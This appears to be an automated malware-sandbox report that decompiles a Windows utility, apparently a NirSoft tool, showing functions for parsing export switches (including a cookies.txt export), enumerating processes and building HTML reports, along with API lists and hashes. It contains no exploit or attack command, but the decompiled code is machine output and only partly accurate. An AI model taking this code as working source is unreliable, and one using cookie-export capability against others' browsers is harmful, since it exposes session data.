0x0040cab1
0x0040caa0
0x0040cae7
0x0040caea
0x0040caea
0x00000000
0x0040cae7

APIs

LoadLibraryW.KERNEL32(psapi.dll,?,0040C284), ref: 0040CA6D
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040CA86
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040CA97
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0040CAA8
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040CAB9
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040CACA
FreeLibrary.KERNEL32(00000000), ref: 0040CAEA

Strings

GetModuleFileNameExW, xrefs: 0040CAA2
EnumProcessModules, xrefs: 0040CA91
EnumProcesses, xrefs: 0040CAB3
psapi.dll, xrefs: 0040CA68
GetModuleBaseNameW, xrefs: 0040CA80
GetModuleInformation, xrefs: 0040CAC4

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 2449869053-70141382
Opcode ID: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
Instruction ID: 77b1fe70fa67b5f7b7b6e6a9f8f9c1ad54eab79ee609772bc806a346005bb9be
Opcode Fuzzy Hash: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
Instruction Fuzzy Hash: D101487078120ADDD751EB68AE84BAB3AF49B44B41B144237E405F12D4DBFC9882DF6C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCAA, Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040BCAA(signed int __eax, void* __esi) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(L"/shtml");
				L0040E03E();
				if(__eax != 0) {
					_push(L"/sverhtml");
					L0040E03E();
					if(__eax != 0) {
						_push(L"/sxml");
						L0040E03E();
						if(__eax != 0) {
							_push(L"/stab");
							L0040E03E();
							if(__eax != 0) {
								_push(L"/sjson");
								L0040E03E();
								if(__eax != 0) {
									_push(L"/scomma");
									L0040E03E();
									if(__eax != 0) {
										_push(L"/scookiestxt");
										L0040E03E();
										asm("sbb eax, eax");
										return ( ~__eax & 0xfffffff8) + 8;
									} else {
										_t5 = 4;
										return _t5;
									}
								} else {
									_t6 = 3;
									return _t6;
								}
							} else {
								_t7 = 2;
								return _t7;
							}
						} else {
							_t8 = 7;
							return _t8;
						}
					} else {
						_t9 = 6;
						return _t9;
					}
				} else {
					_t10 = 5;
					return _t10;
				}
			}

0x0040bcab
0x0040bcb0
0x0040bcb9
0x0040bcc0
0x0040bcc5
0x0040bcce
0x0040bcd5
0x0040bcda
0x0040bce3
0x0040bcea
0x0040bcef
0x0040bcf8
0x0040bcff
0x0040bd04
0x0040bd0d
0x0040bd14
0x0040bd19
0x0040bd22
0x0040bd29
0x0040bd2e
0x0040bd35
0x0040bd3f
0x0040bd24
0x0040bd26
0x0040bd27
0x0040bd27
0x0040bd0f
0x0040bd11
0x0040bd12
0x0040bd12
0x0040bcfa
0x0040bcfc
0x0040bcfd
0x0040bcfd
0x0040bce5
0x0040bce7
0x0040bce8
0x0040bce8
0x0040bcd0
0x0040bcd2
0x0040bcd3
0x0040bcd3
0x0040bcbb
0x0040bcbd
0x0040bcbe
0x0040bcbe

APIs

_wcsicmp.MSVCRT ref: 0040BCB0
_wcsicmp.MSVCRT ref: 0040BCC5

Strings

/shtml, xrefs: 0040BCAB
/stab, xrefs: 0040BCEA
/sxml, xrefs: 0040BCD5
/sjson, xrefs: 0040BCFF
/scookiestxt, xrefs: 0040BD29
/sverhtml, xrefs: 0040BCC0
/scomma, xrefs: 0040BD14

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmp
String ID: /scomma$/scookiestxt$/shtml$/sjson$/stab$/sverhtml$/sxml
API String ID: 2081463915-1797186745
Opcode ID: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
Instruction ID: 8371893b6cdf142ed748882e6751911a4291a5e673982fbb48e018f7079fe289
Opcode Fuzzy Hash: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
Instruction Fuzzy Hash: 7C010C3228936569F9282577AD07B870649CB51BBAF30056FF924E81C1EFED8481605C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9D6, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C9D6() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x41325c != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x4128dc = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x4128d4 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x4128d0 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x412664 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x4128c8 = _t2;
								if(_t2 != 0) {
									 *0x41325c = 1;
								}
							}
						}
					}
				}
				goto L9;
			}

0x0040c9dd
0x0040ca59
0x0040ca59
0x0040c9e5
0x0040c9eb
0x0040c9ef
0x0040ca58
0x00000000
0x0040ca58
0x0040c9fe
0x0040ca02
0x0040ca07
0x0040ca0f
0x0040ca13
0x0040ca18
0x0040ca20
0x0040ca24
0x0040ca29
0x0040ca31
0x0040ca35
0x0040ca3a
0x0040ca42
0x0040ca46
0x0040ca4b
0x0040ca4d
0x0040ca4d
0x0040ca4b
0x0040ca3a
0x0040ca29
0x0040ca18
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,0040C28B), ref: 0040C9E5
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040C9FE
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040CA0F
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040CA20
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040CA31
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040CA42

Strings

Module32Next, xrefs: 0040CA1A
Process32Next, xrefs: 0040CA3C
CreateToolhelp32Snapshot, xrefs: 0040C9F8
kernel32.dll, xrefs: 0040C9E0
Module32First, xrefs: 0040CA09
Process32First, xrefs: 0040CA2B

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
Instruction ID: 7b85a6ede3351e87d48595370c2c99752d77d7c7be9155cf3b7c884c9e88c84f
Opcode Fuzzy Hash: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
Instruction Fuzzy Hash: B2F06230651359D9C720EB256E80BEB2BE45785B40F149237E404F22D4EBBC84968FAC

Uniqueness

Uniqueness Score: -1.00%

Function 004071D1, Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004071D1(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E004057D1(_a4);
				if(_t3 != 0) {
					wcscpy(0x412c38, _a4);
					wcscpy(0x412e48, L"general");
					_t6 = GetPrivateProfileIntW(0x412e48, L"rtl", 0, 0x412c38);
					asm("sbb eax, eax");
					 *0x412ecc =  ~(_t6 - 1) + 1;
					E00406D4D(0x412ed0, L"charset", 0x3f);
					E00406D4D(0x412f50, L"TranslatorName", 0x3f);
					return E00406D4D(0x412fd0, L"TranslatorURL", 0xff);
				}
				return _t3;
			}

0x004071d5
0x004071dd
0x004071eb
0x004071fb
0x0040720c
0x00407215
0x00407224
0x00407229
0x0040723a
0x00000000
0x00407257
0x00407258

APIs

Part of subcall function 004057D1: GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5

wcscpy.MSVCRT ref: 004071EB
wcscpy.MSVCRT ref: 004071FB
GetPrivateProfileIntW.KERNEL32 ref: 0040720C

Part of subcall function 00406D4D: GetPrivateProfileStringW.KERNEL32 ref: 00406D69

Strings

TranslatorName, xrefs: 00407230
8,A, xrefs: 004071E5
TranslatorURL, xrefs: 00407244
H.A, xrefs: 004071F5
general, xrefs: 004071F0
charset, xrefs: 0040721A
rtl, xrefs: 00407206
P/A, xrefs: 00407235

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfilewcscpy$AttributesFileString
String ID: 8,A$H.A$P/A$TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 3176057301-819253090
Opcode ID: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
Instruction ID: f115d196d4af7e8601c57319c09dc176dc9760a1553b0771dc73547d8c0c0b20
Opcode Fuzzy Hash: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
Instruction Fuzzy Hash: 96F0CD32FC036172C62176225E06F6B25148F91B15F15447BBC08FA5C2D6FC08669A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5AB, Relevance: 18.1, APIs: 12, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A5AB(void* __esi) {
				struct HDWP__* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				intOrPtr _v44;
				struct tagPOINT _v56;
				void* _t53;
				int _t99;
				void* _t101;

				_t101 = __esi;
				if( *((intOrPtr*)(__esi + 0x244)) != 0) {
					GetClientRect( *(__esi + 0x208),  &_v40);
					GetWindowRect( *(__esi + 0x214),  &_v56);
					_v20 = _v44 - _v56.y + 1;
					GetWindowRect( *(__esi + 0x218),  &_v56);
					_v16 = _v40.right - _v40.left;
					_t99 = _v44 - _v56.y + 1;
					_v24 = _v40.bottom - _v40.top;
					_v12 = 0xdc;
					if( *(__esi + 0x6d4) != 0) {
						GetWindowRect(GetDlgItem( *(__esi + 0x6d4), 0x40d),  &_v56);
						MapWindowPoints(0,  *(__esi + 0x6d4),  &_v56, 2);
						_v12 = _v44 + 6;
					}
					if( *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x698)) + 0x224)) == 0) {
						_v12 = _v12 & 0x00000000;
					}
					_v8 = BeginDeferWindowPos(4);
					DeferWindowPos(_v8,  *(_t101 + 0x218), 0, 0, 0, _v16, _t99, 4);
					DeferWindowPos(_v8,  *(_t101 + 0x214), 0, 0, _v40.bottom - _v20 + 1, _v16, _v20, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(_t101 + 0x69c)) + 0x2ac), 0, 0, _v12 + _t99, _v16, _v24 - _v12 - _t99 - _v20, 4);
					DeferWindowPos(_v8,  *(_t101 + 0x6d4), 0, 0, _t99, _v16, _v12, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t53;
			}

0x0040a5ab
0x0040a5b8
0x0040a5ca
0x0040a5e0
0x0040a5e9
0x0040a5f6
0x0040a604
0x0040a60d
0x0040a615
0x0040a618
0x0040a61f
0x0040a637
0x0040a647
0x0040a653
0x0040a653
0x0040a663
0x0040a665
0x0040a665
0x0040a67d
0x0040a68e
0x0040a6ad
0x0040a6d8
0x0040a6f0
0x00000000
0x0040a6fc
0x0040a6fe

APIs

GetClientRect.USER32 ref: 0040A5CA
GetWindowRect.USER32 ref: 0040A5E0
GetWindowRect.USER32 ref: 0040A5F6
GetDlgItem.USER32 ref: 0040A630
GetWindowRect.USER32 ref: 0040A637
MapWindowPoints.USER32 ref: 0040A647
BeginDeferWindowPos.USER32 ref: 0040A66B
DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A68E
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A6AD
DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 0040A6D8
DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 0040A6F0
EndDeferWindowPos.USER32(?), ref: 0040A6F5

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Defer$Rect$BeginClientItemPoints
String ID:
API String ID: 552707033-0
Opcode ID: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
Instruction ID: 1e8564dccfd76f42bf82a6a58439150b57488fc8b3b7f8ee37cc979cf164ca84
Opcode Fuzzy Hash: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
Instruction Fuzzy Hash: 1E41B571900209FFDB11DBA8DD89FEEBBB6EB48304F100465E655B61A0C7716A549B14

Uniqueness

Uniqueness Score: -1.00%

Function 00403899, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101
timewindowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403899(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				void* __esi;
				struct HDWP__* _t27;
				intOrPtr* _t51;
				RECT* _t56;

				_push(__ecx);
				_t51 = __ecx;
				if(_a4 != 0x18) {
					L4:
					if(_a4 == 2) {
						KillTimer( *(_t51 + 0x10), 0x41);
					}
					if(_a4 != 0x113) {
						L11:
						if(_a4 == 5) {
							_t27 = BeginDeferWindowPos(5);
							_t56 = _t51 + 0x40;
							_v8 = _t27;
							E004017E9(_t56, _t27, 0x40b, 0, 0, 1);
							E004017E9(_t56, _v8, 0x40c, 1, 0, 0);
							E004017E9(_t56, _v8, 0x40e, 1, 0, 0);
							E004017E9(_t56, _v8, 0x40f, 1, 0, 0);
							E004017E9(_t56, _v8, 0x40d, 0, 0, 1);
							EndDeferWindowPos(_v8);
							InvalidateRect( *(_t56 + 0x10), _t56, 1);
						}
						goto L13;
					} else {
						if(_a8 != 0x41 ||  *((intOrPtr*)(_t51 + 0x78)) == 0 || GetTickCount() -  *((intOrPtr*)(_t51 + 0x7c)) <= 0x1f4) {
							L13:
							return E004015CE(_t51, _a4, _a8, _a12);
						} else {
							 *((intOrPtr*)(_t51 + 0x78)) = 0;
							 *((intOrPtr*)( *_t51 + 4))(0);
							SendMessageW(GetParent( *(_t51 + 0x10)), 0x469, 0, 0);
							goto L11;
						}
					}
				}
				if(_a8 == 0) {
					KillTimer( *(__ecx + 0x10), 0x41);
					goto L4;
				}
				SetTimer( *(__ecx + 0x10), 0x41, 0x64, 0);
				goto L13;
			}

0x0040389c
0x004038ac
0x004038ae
0x004038cf
0x004038d3
0x004038da
0x004038da
0x004038e3
0x0040392e
0x00403932
0x00403936
0x00403945
0x00403949
0x0040394c
0x0040395d
0x0040396e
0x0040397f
0x00403990
0x00403998
0x004039a4
0x004039a4
0x00000000
0x004038e5
0x004038e9
0x004039aa
0x004039be
0x0040390c
0x00403911
0x00403914
0x00403928
0x00000000
0x00403928
0x004038e9
0x004038e3
0x004038b3
0x004038cd
0x00000000
0x004038cd
0x004038bd
0x00000000

APIs

SetTimer.USER32(?,00000041,00000064,00000000), ref: 004038BD
KillTimer.USER32(?,00000041), ref: 004038CD
KillTimer.USER32(?,00000041), ref: 004038DA
GetTickCount.KERNEL32 ref: 004038F8
GetParent.USER32(?), ref: 00403921
SendMessageW.USER32(00000000), ref: 00403928
BeginDeferWindowPos.USER32 ref: 00403936
EndDeferWindowPos.USER32(?), ref: 00403998
InvalidateRect.USER32(?,?,00000001), ref: 004039A4

Strings

A, xrefs: 004038E5

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
String ID: A
API String ID: 2892645895-3554254475
Opcode ID: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
Instruction ID: 0871a1714dd068d8f738543c02bb6dd68063c1354b3792716d758cdabfe2902c
Opcode Fuzzy Hash: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
Instruction Fuzzy Hash: 2B315DB1650608BFEB205F60CC86E9ABAADFB04745F00803AF305754E0C7B69E90DA98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7CE, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040D7CE(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040DFD6();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040DFD6();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040DFD6();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040DFD6();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40f454, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}

0x0040d7e1
0x0040d7e6
0x0040d7e7
0x0040d7e8
0x0040d875
0x0040d87c
0x0040d88a
0x0040d891
0x0040d89f
0x0040d8a6
0x0040d8c0
0x0040d8cb
0x0040d8dd
0x0040d8fb
0x0040d900
0x00000000
0x0040d900
0x0040d7f5
0x0040d7fc
0x0040d80a
0x0040d811
0x0040d82b
0x0040d838
0x0040d84a
0x00000000

APIs

memset.MSVCRT ref: 0040D7FC
memset.MSVCRT ref: 0040D811
_snwprintf.MSVCRT ref: 0040D82B
_snwprintf.MSVCRT ref: 0040D84A
memset.MSVCRT ref: 0040D87C
memset.MSVCRT ref: 0040D891
memset.MSVCRT ref: 0040D8A6
_snwprintf.MSVCRT ref: 0040D8C0
_snwprintf.MSVCRT ref: 0040D8DD

Strings

%%0.%df, xrefs: 0040D81E, 0040D8B3

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
Instruction ID: bd80c20c5eef5304b465cefa7c525b6dc43605deb3d47911a7a30c53393811c5
Opcode Fuzzy Hash: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
Instruction Fuzzy Hash: 9F315E71900129AADB20DF95CC85FEB777CFF48304F0044FAB50AB6152E7749A588B69

Uniqueness

Uniqueness Score: -1.00%

Function 00407047, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00407047(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040E340(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x4131d0; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00406CC6(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00407042, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00407042, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00406DE5(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E00406F88, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00406CC6(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x412c34 =  *0x412c34 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E00406E97(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}

0x0040704f
0x00407054
0x0040705b
0x00407098
0x0040709c
0x004070a2
0x004070aa
0x004070ac
0x004070c2
0x004070c2
0x004070c7
0x004070c8
0x004070e2
0x004070e4
0x004070e6
0x004070e9
0x004070fc
0x004070fc
0x0040710c
0x00407113
0x0040712a
0x00407130
0x00407137
0x00407146
0x0040714b
0x00407157
0x00407160
0x004070ae
0x004070bc
0x004070bc
0x004070be
0x004070c0
0x00000000
0x00000000
0x004070b0
0x004070b3
0x004070b9
0x004070b9
0x00000000
0x004070b9
0x00000000
0x004070b3
0x00000000
0x004070bc
0x004070ac
0x0040705d
0x0040705d
0x00407062
0x00407063
0x00407068
0x0040706f
0x00407075
0x0040707c
0x0040707e
0x00407080
0x00407081
0x00407084
0x0040708d
0x0040708d
0x00407166
0x0040716d

APIs

LoadMenuW.USER32 ref: 0040706F

Part of subcall function 00406E97: GetMenuItemCount.USER32 ref: 00406EAD
Part of subcall function 00406E97: memset.MSVCRT ref: 00406ECC
Part of subcall function 00406E97: GetMenuItemInfoW.USER32 ref: 00406F08
Part of subcall function 00406E97: wcschr.MSVCRT ref: 00406F20

DestroyMenu.USER32(00000000), ref: 0040708D
CreateDialogParamW.USER32 ref: 004070E2
GetDesktopWindow.USER32 ref: 004070ED
CreateDialogParamW.USER32 ref: 004070FA
memset.MSVCRT ref: 00407113
GetWindowTextW.USER32 ref: 0040712A
EnumChildWindows.USER32 ref: 00407157
DestroyWindow.USER32(00000005), ref: 00407160

Part of subcall function 00406CC6: _snwprintf.MSVCRT ref: 00406CEB

Strings

caption, xrefs: 00407141

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
String ID: caption
API String ID: 973020956-4135340389
Opcode ID: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
Instruction ID: 143ff9b161303c46051d95ab40737f9cae21d75e3476d01ba51655d965e5fbc2
Opcode Fuzzy Hash: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
Instruction Fuzzy Hash: 1131B472504208BFEF219F60DC85EAB3B69FB00314F10847AF909A6191D7759D64CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00409D04, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00409D04(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040E340(0x1800, __ecx);
				_t57 = _t49;
				E00408857(_t57, _t49, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x412ed0; // 0x0
				if(_t62 != 0) {
					_push(0x412ed0);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040DFD6();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x412ecc; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00409130(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x94))( *((intOrPtr*)( *_t57 + 0x90))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040DFD6();
				_t43 = E00408857(_t57, _t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00409336(_t57, _t64, _a4);
				}
				return _t43;
			}

0x00409d04
0x00409d0c
0x00409d1c
0x00409d20
0x00409d35
0x00409d3c
0x00409d4a
0x00409d51
0x00409d5f
0x00409d66
0x00409d6b
0x00409d6e
0x00409d7a
0x00409d7c
0x00409d81
0x00409d8c
0x00409d8d
0x00409d8e
0x00409d93
0x00409d93
0x00409d96
0x00409d9c
0x00409daa
0x00409db0
0x00409dcb
0x00409de5
0x00409de6
0x00409df1
0x00409df2
0x00409df3
0x00409e07
0x00409e0c
0x00409e10
0x00000000
0x00409e15
0x00409e1e

APIs

memset.MSVCRT ref: 00409D3C
memset.MSVCRT ref: 00409D51
memset.MSVCRT ref: 00409D66
_snwprintf.MSVCRT ref: 00409D8E
wcscpy.MSVCRT ref: 00409DAA
_snwprintf.MSVCRT ref: 00409DF3

Strings

